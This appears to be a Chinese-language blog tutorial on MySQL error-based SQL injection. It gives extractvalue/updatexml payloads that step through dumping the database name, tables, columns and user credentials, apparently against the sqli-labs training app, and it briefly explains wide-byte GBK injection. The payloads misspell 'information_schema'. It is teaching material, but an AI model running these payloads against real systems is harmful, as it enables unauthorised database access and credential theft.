SQL报错注入

SQL注入报错注入

报错注入原理:报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的在遇到有报错回显的时候,但是没有数据回显的情况下可以利用报错注入的函数:

1.floor():向下取整

2.extractvalue(): 对XML文档进行查询的函数,当参数的格式不正确而

产生的错误,会返回参数的信息

3.updatexml(): 更新xml文档的函数,原理跟extracvalue一样

4.exp0:以e为底的指数函数

5.rand()+group()+count()

updatexml()

函数语法: updatexml(XML_document,XPath_string,new_value);

适用版本:5.1.5+

payload: updatexml(1,concat(0x7e,(select user()),0x7e),1)

前后添加~使其不符合xpath格式从而报错

复制代码
0x7e是~

extractvalue()

函数语法: EXTRACTVALUE(XML_document,XPath_string);

适用版本:5.1.5+

利用原理与updatexml函数相同

payload: and(extractvalue(1,concat(0x7e,(select user()),0x7e))

流程

1.利用爆破数据库名

and extractvalue(1,concat(0x7e,database(),0x7e)) --+

2.利用爆表名

and extractvalue(1,concat(0x7e,(select group_concat(table_name) from infomation_schema.tables where table_schema=database()),0x7e)) --+

3.利用爆列名

and extractvalue(1,concat(0x7e,(select group_concat(column_name) from infomation_schema.columns where table_name='users'),0x7e)) --+

但是可以发现没有全部显示列出来玩吗可以利用and column_name not in('id','login','password','email','secret')来显示其他的值,如果还是没有就全部显示出来就继续加到and 里面的值

and extractvalue(1,concat(0x7e,(select group_concat(column_name) from infomation_schema.columns where table_name='users' and column_name not in('id','login','password','email','secret')),0x7e)) --+

4.利用爆破值

and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e)) --+

同样的没有显示全利用where username not in('Dumb','Angelina')

and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in('Dumb','Angelina')),0x7e)) --+

SQL注入之宽字节注入

1.宽字节注入

原因:

1.现在大多数的网站对于SQL注入都做了一定的方法,例如使用一些Mysql中转义的函数addslashes,mysql_realescape_string,mysql_escape_string等,还有一种是配置magic_quote gpc,不过PHP高版本已经移除此功能。其实这些函数就是为了过滤用户输入的一些数据,对

特殊的字符加上反斜杠"\"进行转义。

2.网站开启了magic_quote gpc,或者使用了上面的转义函数数据库设置成gbk编码(不是html编码)

3.在编码中,gbk编码占用2个字符,ascll占用1个字符,攻击者恶意构造,把ascll字符吃掉,就能进行下一步攻击

相关推荐
Web3&Basketball3 分钟前
达梦数据库性能调优总结
数据库·oracle
-Xie-7 分钟前
Mysql杂志(三十三)——锁
数据库·mysql
情深不寿31714 分钟前
MySQL————索引
数据库·mysql
三十_14 分钟前
TypeORM 一对一关联篇:掌握实体关系与 JoinColumn
数据库
Brianna Home29 分钟前
博客安全攻防演练:从攻击者视角构筑铜墙铁壁
网络·数据库·安全·oracle
冻咸鱼40 分钟前
MySQL表设计详解
数据库·mysql·1nf·2nf·3nf
小小测试开发41 分钟前
Python SQLAlchemy:告别原生 SQL,用 ORM 优雅操作数据库
数据库·python·sql·sqlalchemy
施嘉伟1 小时前
浅谈信创数据库改造重难点
数据库
亚雷1 小时前
深入浅出达梦共享存储集群数据同步
数据库·后端·程序员